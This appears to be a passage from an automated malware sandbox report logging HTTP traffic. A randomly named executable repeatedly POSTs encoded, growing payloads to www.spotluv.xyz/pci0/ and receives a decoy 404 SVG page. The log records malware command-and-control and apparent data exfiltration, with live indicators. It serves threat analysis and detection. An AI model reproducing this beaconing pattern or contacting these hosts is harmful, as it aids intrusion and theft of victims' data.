                                                            location: http://vintagewins.com/n8dl/?vX=FC28+8TNt1EBJ9Rr13Lf8bY2TrPAAO0Ms+TIyItlK84e+VLAwR127cfT6eGfINY83g5c74t6Ntc+Rr+iqurKq/8v/YzcG8LG32bad+3/XATcsm3Xq6o13Rk=&_B7=LxyxWrj8kri0gh
                                                            content-length: 0
                                                            date: Wed, 03 Jul 2024 15:38:08 GMT
                                                            server: LiteSpeed


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            25192.168.11.2049799203.161.50.127807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:38:14.032248974 CEST779OUTPOST /pci0/ HTTP/1.1
                                                            Host: www.spotluv.xyz
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.spotluv.xyz
                                                            Referer: http://www.spotluv.xyz/pci0/
                                                            Content-Length: 199
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 54 51 70 79 79 68 79 6b 62 30 2b 31 72 70 68 49 43 6d 78 52 39 39 6d 61 57 54 58 30 48 6c 35 68 45 4f 70 42 79 42 4d 6f 32 79 62 2f 7a 31 6f 63 77 4e 69 33 46 4e 73 51 72 54 62 31 42 54 5a 41 6e 2b 43 6b 70 30 49 47 74 46 2b 79 7a 69 35 54 66 2f 6c 67 75 52 52 30 50 44 68 48 70 53 76 44 2b 61 53 37 63 63 6b 37 63 33 38 32 31 50 34 66 69 33 43 54 77 37 6e 47 75 64 67 70 58 76 2f 35 65 39 59 64 6a 45 48 79 4a 37 62 43 6e 58 53 73 48 42 54 5a 50 38 6e 44 42 5a 79 4a 37 35 48 4a 58 30 68 2f 6d 66 69 4d 4c 31 31 47 56 32 62 74 61 4d 4f 48 49 75 66 58 51 41 76 4e 69 44 68 4d 61 77 3d 3d
                                                            Data Ascii: vX=TQpyyhykb0+1rphICmxR99maWTX0Hl5hEOpByBMo2yb/z1ocwNi3FNsQrTb1BTZAn+Ckp0IGtF+yzi5Tf/lguRR0PDhHpSvD+aS7cck7c3821P4fi3CTw7nGudgpXv/5e9YdjEHyJ7bCnXSsHBTZP8nDBZyJ75HJX0h/mfiML11GV2btaMOHIufXQAvNiDhMaw==
                                                            Jul 3, 2024 17:38:14.226490974 CEST1289INHTTP/1.1 404 Not Found
                                                            Date: Wed, 03 Jul 2024 15:38:14 GMT
                                                            Server: Apache
                                                            Content-Length: 16052
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                            Jul 3, 2024 17:38:14.226507902 CEST1289INData Raw: 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c 61 79 65 72 31 22 3e 0a 20 20 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 67 36 32 31 39 22 0a 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20
                                                            Data Ascii: 14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000
                                                            Jul 3, 2024 17:38:14.226520061 CEST1289INData Raw: 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 32 33 37 34 33 33 39 33 70 78 3b 73 74 72 6f 6b
                                                            Data Ascii: style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0
                                                            Jul 3, 2024 17:38:14.226532936 CEST1289INData Raw: 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c
                                                            Data Ascii: 157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.34
                                                            Jul 3, 2024 17:38:14.226572990 CEST1289INData Raw: 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72
                                                            Data Ascii: none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.2
                                                            Jul 3, 2024 17:38:14.226587057 CEST1289INData Raw: 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c 33 31 2e 37 38 39 30 34 20 34 2e 35 31 37 32 38 2c 38 2e 37 35 33 32 37 20 37 2e 32 39 39 36 34 2c 31 34 2e 35 34 39 38 35
                                                            Data Ascii: 9885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.53226 -5.4209,56.44
                                                            Jul 3, 2024 17:38:14.226728916 CEST1289INData Raw: 20 31 2e 30 30 31 37 31 31 2c 33 36 2e 38 38 37 30 31 20 31 2e 35 39 30 39 39 39 2c 35 34 2e 33 32 39 39 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65
                                                            Data Ascii: 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545" d="m 83.
                                                            Jul 3, 2024 17:38:14.226742029 CEST1289INData Raw: 20 64 3d 22 6d 20 34 32 2e 34 32 36 34 30 37 2c 31 35 35 2e 33 38 38 32 35 20 63 20 33 2e 34 31 38 34 2c 30 2e 38 32 35 31 33 20 36 2e 38 33 36 30 38 32 2c 31 2e 36 35 30 30 39 20 31 30 2e 36 30 36 39 39 37 2c 32 2e 31 38 30 33 34 20 33 2e 37 37
                                                            Data Ascii: d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3.417163,-0.0589 6.953769,-0.17681 10.606588,-0.23572 3.652818,
                                                            Jul 3, 2024 17:38:14.226844072 CEST1289INData Raw: 74 68 34 36 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66
                                                            Data Ascii: th4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse ry="4.315
                                                            Jul 3, 2024 17:38:14.226856947 CEST1289INData Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30
                                                            Data Ascii: style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.03816
                                                            Jul 3, 2024 17:38:14.408354998 CEST1289INData Raw: 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d
                                                            Data Ascii: sform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667 0.16767,0.16717 0.68771,0.16717 0.89053,0.36949 0.20282,0.202


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            26192.168.11.2049800203.161.50.127807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:38:16.781913042 CEST1119OUTPOST /pci0/ HTTP/1.1
                                                            Host: www.spotluv.xyz
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.spotluv.xyz
                                                            Referer: http://www.spotluv.xyz/pci0/
                                                            Content-Length: 539
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 54 51 70 79 79 68 79 6b 62 30 2b 31 35 61 4a 49 4e 6c 70 52 73 64 6d 5a 4b 44 58 30 4e 46 34 6d 45 50 56 42 79 41 59 34 32 45 44 2f 7a 52 73 63 78 4a 32 33 49 74 73 51 67 7a 61 39 66 6a 5a 4c 6e 2b 4f 73 70 78 6f 47 74 46 71 79 79 55 6c 54 64 50 6c 2f 68 78 52 7a 49 44 68 4b 34 43 75 43 2b 61 65 4a 63 59 73 37 63 48 51 32 6b 39 51 66 6f 44 57 63 30 62 6e 41 6f 64 67 6d 65 50 2f 7a 65 39 6c 39 6a 45 50 69 4a 49 48 43 6e 33 79 73 49 68 54 61 42 4d 6e 4f 4e 35 7a 46 71 70 71 58 59 6b 52 70 6d 38 47 55 52 48 6c 4e 59 57 43 67 64 4e 65 4c 55 50 44 4f 57 53 71 49 70 77 5a 43 49 35 54 6b 43 34 7a 78 39 77 48 32 6b 66 49 75 71 46 63 48 38 57 47 70 48 4d 50 45 2f 42 43 57 2b 45 6b 77 32 58 49 42 30 63 34 50 6c 79 2b 58 6c 58 77 4a 35 58 39 50 39 7a 6d 51 4c 34 47 57 68 32 66 73 63 33 78 38 68 4c 59 78 53 48 70 4a 72 31 4f 30 6d 55 38 52 74 70 74 6e 6c 37 6d 69 50 7a 4d 51 59 79 38 4a 74 4d 6a 34 30 30 6e 75 53 66 57 44 67 46 58 6f 50 4b 46 68 54 6f 34 73 2b 6b 5a 48 56 2b 58 75 75 54 45 41 36 6a 30 [TRUNCATED]
                                                            Data Ascii: vX=TQpyyhykb0+15aJINlpRsdmZKDX0NF4mEPVByAY42ED/zRscxJ23ItsQgza9fjZLn+OspxoGtFqyyUlTdPl/hxRzIDhK4CuC+aeJcYs7cHQ2k9QfoDWc0bnAodgmeP/ze9l9jEPiJIHCn3ysIhTaBMnON5zFqpqXYkRpm8GURHlNYWCgdNeLUPDOWSqIpwZCI5TkC4zx9wH2kfIuqFcH8WGpHMPE/BCW+Ekw2XIB0c4Ply+XlXwJ5X9P9zmQL4GWh2fsc3x8hLYxSHpJr1O0mU8Rtptnl7miPzMQYy8JtMj400nuSfWDgFXoPKFhTo4s+kZHV+XuuTEA6j0FijNE5/6p9Yz8T4AMvPOvgdMcUelmYlOebkrJTKpnGm5PTu1fb1WjX0nypXHGBmoRLNfjsscRpTqfBcSpHHGSyxPlCAIDHjmdg7ygURoBtt5xJpO5kl+Xxlv0ct+CutbDDkNpOLTlxCBPkNl4TB7kNsWVbeL0p2xh6AC4vSZOJi+F7SpfNvmoChAmp+vY2MVRhKWhBAI=
                                                            Jul 3, 2024 17:38:16.967883110 CEST1289INHTTP/1.1 404 Not Found
                                                            Date: Wed, 03 Jul 2024 15:38:16 GMT
                                                            Server: Apache
                                                            Content-Length: 16052
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                            Jul 3, 2024 17:38:16.967956066 CEST1289INData Raw: 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c 61 79 65 72 31 22 3e 0a 20 20 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 67 36 32 31 39 22 0a 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20
                                                            Data Ascii: 14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000
                                                            Jul 3, 2024 17:38:16.968014956 CEST1289INData Raw: 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 32 33 37 34 33 33 39 33 70 78 3b 73 74 72 6f 6b
                                                            Data Ascii: style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0
                                                            Jul 3, 2024 17:38:16.968070030 CEST1289INData Raw: 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c
                                                            Data Ascii: 157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.34
                                                            Jul 3, 2024 17:38:16.968126059 CEST1289INData Raw: 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72
                                                            Data Ascii: none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.2
                                                            Jul 3, 2024 17:38:16.968214989 CEST1289INData Raw: 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c 33 31 2e 37 38 39 30 34 20 34 2e 35 31 37 32 38 2c 38 2e 37 35 33 32 37 20 37 2e 32 39 39 36 34 2c 31 34 2e 35 34 39 38 35
                                                            Data Ascii: 9885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.53226 -5.4209,56.44
                                                            Jul 3, 2024 17:38:16.968277931 CEST1289INData Raw: 20 31 2e 30 30 31 37 31 31 2c 33 36 2e 38 38 37 30 31 20 31 2e 35 39 30 39 39 39 2c 35 34 2e 33 32 39 39 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65
                                                            Data Ascii: 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545" d="m 83.
                                                            Jul 3, 2024 17:38:16.968333006 CEST1289INData Raw: 20 64 3d 22 6d 20 34 32 2e 34 32 36 34 30 37 2c 31 35 35 2e 33 38 38 32 35 20 63 20 33 2e 34 31 38 34 2c 30 2e 38 32 35 31 33 20 36 2e 38 33 36 30 38 32 2c 31 2e 36 35 30 30 39 20 31 30 2e 36 30 36 39 39 37 2c 32 2e 31 38 30 33 34 20 33 2e 37 37
                                                            Data Ascii: d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3.417163,-0.0589 6.953769,-0.17681 10.606588,-0.23572 3.652818,
                                                            Jul 3, 2024 17:38:16.968386889 CEST1289INData Raw: 74 68 34 36 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66
                                                            Data Ascii: th4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse ry="4.315
                                                            Jul 3, 2024 17:38:16.968442917 CEST1289INData Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30
                                                            Data Ascii: style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.03816
                                                            Jul 3, 2024 17:38:17.144581079 CEST1289INData Raw: 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d
                                                            Data Ascii: sform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667 0.16767,0.16717 0.68771,0.16717 0.89053,0.36949 0.20282,0.202


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            27192.168.11.2049801203.161.50.127807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:38:19.538357019 CEST3867OUTPOST /pci0/ HTTP/1.1
                                                            Host: www.spotluv.xyz
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.spotluv.xyz
                                                            Referer: http://www.spotluv.xyz/pci0/
                                                            Content-Length: 52927
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 54 51 70 79 79 68 79 6b 62 30 2b 31 35 61 4a 49 4e 6c 70 52 73 64 6d 5a 4b 44 58 30 4e 46 34 6d 45 50 56 42 79 41 59 34 32 45 4c 2f 77 69 6b 63 78 72 65 33 48 4e 73 51 38 44 61 38 66 6a 5a 57 6e 2b 57 53 70 78 6c 6b 74 44 75 79 7a 44 4a 54 64 39 64 2f 32 78 52 79 43 6a 68 49 70 53 75 65 2b 61 53 64 63 59 34 4e 63 32 55 32 31 4b 63 66 73 79 57 54 70 37 6e 47 6f 64 67 71 4a 66 2b 4d 65 39 68 74 6a 45 7a 69 4a 4b 7a 43 39 68 2b 73 45 53 72 61 4d 38 6e 50 57 4a 7a 61 7a 35 71 63 59 6c 31 58 6d 38 47 45 52 47 68 4e 59 56 4b 67 63 4b 79 49 56 76 44 4f 62 79 71 50 69 51 45 4c 49 35 2f 43 43 37 76 78 39 78 6a 32 72 66 49 75 73 6e 30 45 31 57 47 72 51 73 50 70 37 42 4f 65 2b 45 68 55 32 57 38 42 31 73 38 50 33 7a 2b 58 6e 32 77 4a 6e 6e 39 4a 35 7a 6d 44 52 49 47 4b 68 32 50 4b 63 30 49 4a 68 4d 67 78 55 54 78 4a 35 6b 4f 33 77 6b 38 66 6a 4a 73 39 68 37 61 55 50 33 70 53 59 79 38 67 74 4e 6e 34 33 48 76 75 56 75 57 63 6a 56 58 76 57 36 46 30 47 34 46 68 2b 67 78 78 56 2b 50 2b 75 55 55 41 37 44 30 [TRUNCATED]
